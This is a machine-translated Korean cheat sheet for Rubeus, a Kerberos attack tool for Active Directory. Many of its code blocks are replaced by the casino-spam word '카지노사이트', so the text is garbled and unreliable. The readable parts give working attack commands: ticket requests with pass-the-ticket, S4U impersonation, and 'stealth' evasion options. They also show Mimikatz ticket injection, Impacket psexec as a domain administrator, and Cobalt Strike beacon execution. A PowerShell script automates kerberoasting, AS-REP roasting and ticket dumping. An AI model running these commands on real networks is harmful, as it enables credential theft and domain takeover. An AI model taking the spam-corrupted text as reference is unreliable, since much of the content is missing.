Rubeus Kerberos 상호 작용 공구 Cheat 장¶

제품정보¶

Rubeus는 익지않는 Kerberos 상호 작용과 남용을 위한 C# 연장통입니다. Kerberos 구현을 공격하고 티켓 요청, 갱신 및 다양한 Kerberos 기반 공격에 대한 기능을 포함합니다. Rubeus는 Active Directory 침투 테스트 및 빨간색 팀 작업에 특히 유용합니다.

· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.

설치하기¶

사전 컴파일 된 Binary¶

카지노사이트

소스에서 컴파일¶

카지노사이트

다운로드 제품 설명¶

카지노사이트

기본 사용¶

명령 구조¶

카지노사이트

유효한 명령¶

Command	Description
`asktgt`	Request a TGT (Ticket Granting Ticket)
`asktgs`	Request a TGS (Ticket Granting Service)
`askticket`	Request a ticket for a specific service
`renew`	Renew a ticket
`s4u`	Perform S4U (Service for User) attacks
`ptt`	Pass-the-ticket attacks
`purge`	Purge tickets from memory
`describe`	Describe ticket contents
`klist`	List current tickets
`dump`	Dump tickets from memory
`triage`	Triage tickets
`monitor`	Monitor for new tickets
`harvest`	Harvest tickets
`brute`	Brute force passwords
`kerberoast`	Kerberoasting attacks
`asreproast`	AS-REP roasting attacks

티켓 요청 및 관리¶

TGT (티켓 부여 티켓)¶

카지노사이트

TGS (티켓 보조 서비스)¶

카지노사이트

티켓 관리¶

카지노사이트

Kerberoasting 공격¶

기본 Kerberoasting¶

카지노사이트

고급 Kerberoasting¶

카지노사이트

대상 Kerberoasting¶

카지노사이트

AS-REP 로스팅 공격¶

기본 AS-REP 로스팅¶

ο 회원 관리

고급 AS-REP 로스팅¶

카지노사이트

Pass-the-Ticket (PTT) 공격¶

기본 패스-티켓¶

카지노사이트

고급 PTT 기술 정보¶

카지노사이트

S4U (사용자 서비스) 공격¶

S4U2자 관련 기사¶

카지노사이트

S4U2Proxy 공격¶

카지노사이트

변형된 위임 Abuse¶

카지노사이트

황금과 실버 티켓 공격¶

골든 티켓 생성¶

카지노사이트

실버 티켓 생성¶

카지노사이트

티켓 수확 및 모니터링¶

티켓 수확¶

오프화이트

티켓 감시¶

카지노사이트

티켓 요금¶

오프화이트

비밀번호¶

카지노사이트

Credential 검증¶

카지노사이트

고급 기술¶

크로스 도어 관련 기사¶

카지노사이트

법적 고지¶

카지노사이트

자원 기반 변형 위임 위임¶

카지노사이트

Evasion 기술¶

옵션 정보 관련 기사¶

카지노사이트

스텔스 운영¶

# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0

# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
```의 경우

## 다른 도구와 통합

### Mimikatz 통합
```cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi

# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
```에 대하여

### Impacket 통합
```bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
```의 경우

### Cobalt Strike 통합

Cobalt Strike beacon commands¶

beacon> execute-assembly Rubeus.exe kerberoast beacon> execute-assembly Rubeus.exe asreproast beacon> execute-assembly Rubeus.exe dump ```에 대하여

자동화 스크립트¶

종합 Kerberos 평가¶

```powershell

Comprehensive Kerberos assessment script¶

param( [string]$Domain = $env:USERDOMAIN, [string]$OutputPath = "C:\Temp\KerberosAssessment" )

Create output directory¶

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

Kerberoasting¶

Write-Host "[+] Performing Kerberoasting..." & Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

AS-REP Roasting¶

Write-Host "[+] Performing AS-REP Roasting..." & Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

Ticket triage¶

Write-Host "[+] Triaging current tickets..." & Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"

Dump tickets¶

Write-Host "[+] Dumping tickets..." & Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath" ```의 경우

자동 티켓 수확¶

카지노사이트

도메인 Reconnaissance 스크립트¶

카지노사이트

문제 해결¶

일반적인 문제¶

카지노사이트

Debug 모드¶

카지노사이트

오류 해결¶

카지노사이트

최고의 연습¶

운영 보안¶

** 합법적인 계정 사용 **: 가능한 경우 의심스러운 서비스 계정
Limit 요청: 요청으로 도메인 컨트롤러를 홍수시키지 마십시오.
시간 동기화: 시계 skew를 피하기 위하여 적당한 시간 동기화를 지킵니다
명세 ** 청소 ** : 작업 후 인젝터 티켓을 제거
명세 **Monitor 로그 **: 생성된 보안 이벤트의 인식

공격 전략¶

카지노사이트

지원하다¶

*이 속임수 시트는 Rubeus를 사용하여 포괄적 인 참조를 제공합니다. Active Directory 보안 평가를 수행하기 전에 항상 적절한 승인이 있습니다. *필수